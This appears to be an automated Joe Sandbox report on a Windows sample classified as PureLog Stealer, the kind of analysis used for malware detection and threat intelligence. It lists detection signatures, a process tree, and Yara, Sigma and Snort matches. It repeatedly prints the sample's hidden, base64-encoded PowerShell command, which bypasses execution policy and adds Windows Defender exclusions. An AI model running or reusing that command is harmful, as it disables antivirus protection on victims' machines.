Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1458397
MD5:af4a6267ce7f24818feeb7d2d62e72c2
SHA1:dd780f62e9539c39244526e26e518663b53fb20e
SHA256:43261f85db3ab88ed6e6b00b4227c5e8e90ddbcabb491109196a0643aeb3d313
Tags:exe
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AF4A6267CE7F24818FEEB7D2D62E72C2)
  • powershell.exe (PID: 7748 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • TypeId.exe (PID: 7764 cmdline: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe MD5: AF4A6267CE7F24818FEEB7D2D62E72C2)
    • InstallUtil.exe (PID: 8028 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • powershell.exe (PID: 8124 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • txxbiwtbs.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe MD5: E8CE921868FE7C47FD2C236555EE5BFD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0xb0508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0xb3a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 47 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.file.exe.459c2e8.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.file.exe.459c2e8.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              3.2.TypeId.exe.4a46068.12.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                3.2.TypeId.exe.4a96088.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.file.exe.440c2a8.9.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 55 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe
                    Sigma detected: Suspicious Execution of Powershell with Base64
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe

                    Snort Signatures

                    Timestamp:06/17/24-16:18:47.509452
                    SID:2017962
                    Source Port:443
                    Destination Port:49732
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/17/24-16:18:41.893163
                    SID:2017962
                    Source Port:443
                    Destination Port:49731
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/17/24-16:18:41.893163
                    SID:2022640
                    Source Port:443
                    Destination Port:49731
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/17/24-16:18:47.509452
                    SID:2022640
                    Source Port:443
                    Destination Port:49732
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/17/24-16:18:42.601428
                    SID:2020482
                    Source Port:443
                    Destination Port:49731
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeReversingLabs: Detection: 13%
                    Multi AV Scanner detection for submitted file
                    Source: file.exeReversingLabs: Detection: 13%
                    Source: file.exeVirustotal: Detection: 39%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:65277 version: TLS 1.2
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Fbedztzxbbe.pdb source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
